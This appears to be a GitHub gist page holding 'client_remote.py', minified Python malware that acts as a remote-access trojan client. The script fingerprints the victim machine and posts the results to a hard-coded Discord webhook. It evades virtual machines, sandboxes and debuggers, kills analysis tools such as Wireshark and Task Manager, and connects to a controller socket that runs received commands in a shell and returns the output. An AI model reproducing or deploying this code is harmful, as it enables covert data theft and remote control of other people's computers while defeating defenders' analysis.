Skip to content

Instantly share code, notes, and snippets.

@CookiesKush

CookiesKush/client_remote.py

Last active September 15, 2022 17:19
Show Gist options
  • Save CookiesKush/5133de5acf2bd94da6d6fcb843fc65de to your computer and use it in GitHub Desktop.
Save CookiesKush/5133de5acf2bd94da6d6fcb843fc65de to your computer and use it in GitHub Desktop.
Download ZIP
Raw
client_remote.py
q='root'
p='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'
o='User-Agent'
n='\n'
m='%012x'
l='..'
k=':'
j='None'
i='https://api.ipify.org'
h=getattr
g=len
T=''
S=Exception
O='ascii'
N=False
I='content'
F=str
E=True
import os as A,re,sys as H,wmi,uuid as P,ctypes as B,psutil as J,win32api as K,win32process as L,random
from subprocess import PIPE as M,Popen,check_output as U
from socket import socket as V,AF_INET as W,SOCK_STREAM as X
from signal import signal as Q,SIGINT as Y,SIGTERM as Z
from requests import get as D,post as G
from datetime import datetime as a
from threading import Thread as R
from typing import Tuple
from time import sleep as C
b='https://discord.com/api/webhooks/1000507254820307015/bBHRwxLMs10xseUyhXKlFtqHKb4bFpOwgb9VKLvfxS4JVlfoTeieKRAejFP8RQLDhk7H'
c='192.168.0.2'
d=int('1888')
class e:
def __init__(B):
B.api=b;B.vmcheck_switch=E;B.vtdetect_switch=E;B.listcheck_switch=E;B.anti_debug_switch=E
try:B.ip=D(i).text
except:B.ip=j
B.serveruser=A.getenv('UserName');B.pc_name=A.getenv('COMPUTERNAME');B.mac=k.join(re.findall(l,m%P.getnode()));B.computer=wmi.WMI();B.os_info=B.computer.Win32_OperatingSystem()[0];B.os_name=B.os_info.Name.encode('utf-8').split(b'|')[0];B.gpu=B.computer.Win32_VideoController()[0].Name;B.currentplat=B.os_name;B.hwid=U('wmic csproduct get uuid').decode().split(n)[1].strip();B.hwidlist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt');B.pcnamelist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt');B.pcusernamelist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt');B.iplist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt');B.maclist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt');B.gpulist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt');B.platformlist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_platforms.txt');B.sandboxDLLs=['sbiedll.dll','api_log.dll','dir_watch.dll','pstorec.dll','vmcheck.dll','wpespy.dll'];B.program_blacklist=['httpdebuggerui.exe','wireshark.exe','HTTPDebuggerSvc.exe','fiddler.exe','regedit.exe','taskmgr.exe','vboxservice.exe','df5serv.exe','processhacker.exe','vboxtray.exe','vmtoolsd.exe','vmwaretray.exe','ida64.exe','ollydbg.exe','pestudio.exe','vmwareuser','vgauthservice.exe','vmacthlp.exe','x96dbg.exe','vmsrvc.exe','x32dbg.exe','vmusrvc.exe','prl_cc.exe','prl_tools.exe','xenservice.exe','qemu-ga.exe','joeboxcontrol.exe','ksdumperclient.exe','ksdumper.exe','joeboxserver.exe']
def post_message(A,msg):G(A.api,headers={o:p},data={I:f"{msg}"})
def anti_debug(D):
while E:
try:
C(0.7)
for B in J.process_iter():
if any((A in B.name().lower()for A in D.program_blacklist)):
try:D.post_message(f"Anti-Debug Program: {B.name()} was detected running on the system. Closing program...");B.kill();A._exit(1)
except (J.NoSuchProcess,J.AccessDenied):pass
except:pass
def block_dlls(J):
while E:
try:
C(1);B=[];M=L.EnumProcesses()
for N in M:
try:
D=K.OpenProcess(1040,0,N)
try:
O=L.EnumProcessModules(D)
for P in O:
H=F(L.GetModuleFileNameEx(D,P)).lower()
for Q in J.sandboxDLLs:
if Q in H:
if H not in B:B.append(H)
finally:K.CloseHandle(D)
except:pass
if B:G(f"{J.api}",json={I:f"```yaml\n The following sandbox-indicative DLLs were discovered loaded in processes running on the system. Do not proceed.\n Dlls: {B}\n ```"});A._exit(1)
except:pass
def ram_check(E):
class D(B.Structure):_fields_=[('dwLength',B.c_ulong),('dwMemoryLoad',B.c_ulong),('ullTotalPhys',B.c_ulonglong),('ullAvailPhys',B.c_ulonglong),('ullTotalPageFile',B.c_ulonglong),('ullAvailPageFile',B.c_ulonglong),('ullTotalVirtual',B.c_ulonglong),('ullAvailVirtual',B.c_ulonglong),('sullAvailExtendedVirtual',B.c_ulonglong)]
C=D();C.dwLength=B.sizeof(D);B.windll.kernel32.GlobalMemoryStatusEx(B.byref(C))
if C.ullTotalPhys/1073741824<1:G(f"{E.api}",json={I:f"```yaml\n Ram Check: Less than 4 GB of RAM exists on this system. Exiting program...\n ```"});A._exit(1)
def is_debugger(C):
D=B.windll.kernel32.IsDebuggerPresent()
if D:G(f"{C.api}",json={I:f"```yaml\n IsDebuggerPresent: A debugger is present, exiting program...\n ```"});A._exit(1)
if B.windll.kernel32.CheckRemoteDebuggerPresent(B.windll.kernel32.GetCurrentProcess(),N)!=0:G(f"{C.api}",json={I:f"```yaml\n CheckRemoteDebuggerPresent: A debugger is present, exiting program...\n ```"});A._exit(1)
def disk_check(D):
B=50
if g(H.argv)>1:B=float(H.argv[1])
E,F,E=K.GetDiskFreeSpaceEx();C=F/1073741824
if C<B:G(f"{D.api}",json={I:f"```yaml\n Disk Check: The disk size of this host is {C} GB, which is less than the minimum {B} GB. Exiting program...\n ```"});A._exit(1)
def vtdetect(A):G(A.api,headers={o:p},data={I:f"""```yaml
![PC DETECTED]!
PC Name: {A.pc_name}
PC Username: {A.serveruser}
HWID: {A.hwid}
IP: {A.ip}
MAC: {A.mac}
PLATFORM: {A.os_name}
CPU: {A.computer.Win32_Processor()[0].Name}
RAM: {F(round(J.virtual_memory().total/1024.0**3))} GB
GPU: {A.gpu}
TIME: {a.now().strftime("%Y-%m-%d %H:%M:%S")}```"""})
def vmcheck(B):
def C():A=None;return h(H,'base_prefix',A)or h(H,'real_prefix',A)or H.prefix
def D():return C()!=H.prefix
if D():B.post_message('**VM DETECTED, EXITING PROGRAM...**');A._exit(1)
def E():
C=A.system('REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul');D=A.system('REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul')
if C!=1 and D!=1:B.post_message('VMware Registry Detected');A._exit(1)
def F():
H='SystemRoot';E=A.path.join(A.environ[H],'System32\\vmGuestLib.dll');F=A.path.join(A.environ[H],'vboxmrxnp.dll');G=A.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read();C=[]
for D in G.split(' '):
if'.exe'in D:C.append(D.replace('K\n',T).replace(n,T))
if'VMwareService.exe'in C or'VMwareTray.exe'in C:B.post_message('VMwareService.exe & VMwareTray.exe process are running');A._exit(1)
if A.path.exists(E):B.post_message('**Vmware DLL Detected**');A._exit(1)
if A.path.exists(F):B.post_message('**VirtualBox DLL Detected**');A._exit(1)
def G():
C=k.join(re.findall(l,m%P.getnode()));D=['00:05:69','00:0c:29','00:1c:14','00:50:56']
if C[:8]in D:B.post_message('**VMware MAC Address Detected**');A._exit(1)
E(),F(),G();B.post_message('[+] VM Not Detected')
def listcheck(B):
D='[ERROR]: Failed to connect to database.'
try:
if B.hwid in B.hwidlist.text:B.post_message(f"**Blacklisted HWID Detected. HWID:** `{B.hwid}`");C(2);A._exit(1)
except:B.post_message(D);C(2);A._exit(1)
try:
if B.serveruser in B.pcusernamelist.text:B.post_message(f"**Blacklisted PC User:** `{B.serveruser}`");C(2);A._exit(1)
except:B.post_message(D);C(2);A._exit(1)
try:
if B.pc_name in B.pcnamelist.text:B.post_message(f"**Blacklisted PC Name:** `{B.pc_name}`");C(2);A._exit(1)
except:B.post_message(D);C(2);A._exit(1)
try:
if B.ip in B.iplist.text:B.post_message(f"**Blacklisted IP:** `{B.ip}`");C(2);A._exit(1)
except:B.post_message(D);C(2);A._exit(1)
try:
if B.mac in B.maclist.text:B.post_message(f"**Blacklisted MAC:** `{B.mac}`");C(2);A._exit(1)
except:B.post_message(D);C(2);A._exit(1)
try:
if B.gpu in B.gpulist.text:B.post_message(f"**Blacklisted GPU:** `{B.gpu}`");C(2);A._exit(1)
except:B.post_message(D);C(2);A._exit(1)
def start(A):
A.is_debugger(),A.disk_check(),A.ram_check()
if A.anti_debug_switch:R(name='Anti-Debug',target=A.anti_debug).start();R(name='Anti-DLL',target=A.block_dlls).start()
if A.vtdetect_switch:A.vtdetect()
if A.vmcheck_switch:A.vmcheck()
if A.listcheck_switch:A.listcheck()
class f:
def __init__(D,connect=(c,d)):
Q(Y,D.exit_gracefully);Q(Z,D.exit_gracefully);D.bot_name=F(A.getlogin()).lower();D.temp=A.getenv('temp');D.is_admin=B.windll.shell32.IsUserAnAdmin()!=0;D.public_ip=D.getip();D.stop=N;D.run=N
while not D.stop:
try:D._connect(connect)
except KeyboardInterrupt:continue
except:C(1)
def exit_gracefully(B,signum,frame):B.stop=E;B.run=N;B.sock.close();C(1);A._exit(1)
def _connect(A,connect):A.sock=V(W,X);A.sock.connect(connect);A.start()
def _recv(B):
A=B.sock.recv(1024).decode(O)
if q in A:return A
else:return A.lower()
def getip(B):
try:A=D(i).text
except:A=j
return A
def _shell_run(C,commands):
B=Popen(commands,shell=E,stdout=M,stderr=M,stdin=M);A=B.stderr.read()+B.stdout.read()
if g(A)==0:A=b'No Output'
C.sock.send(A)
def start(A):
while E:
B=A._recv()
if q in B:
try:B=B.replace('root ',T);D=F(B);A._shell_run(D)
except S as C:A.sock.send(f"""
Error:
{C}
========================================================================
""".encode(O))
elif'admincheck'in B:
try:A.sock.send(F.encode('Admin privileges'))if A.is_admin==E else A.sock.send(F.encode('NO Admin privileges'))
except S as C:A.sock.send(f"""
Error:
{C}
========================================================================
""".encode(O))
elif B=='kill':A.sock.send(F.encode('Client Killed'));A.sock.close();A.exit_gracefully(0,0)
elif B=='getip':
try:A.sock.send(F.encode(A.public_ip))
except S as C:A.sock.send(f"""
Error:
{C}
========================================================================
""".encode(O))
else:A.sock.send(F.encode('Invalid Command'))
def r():
try:D('https://google.com')
except:A._exit(1)
e().start();f()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment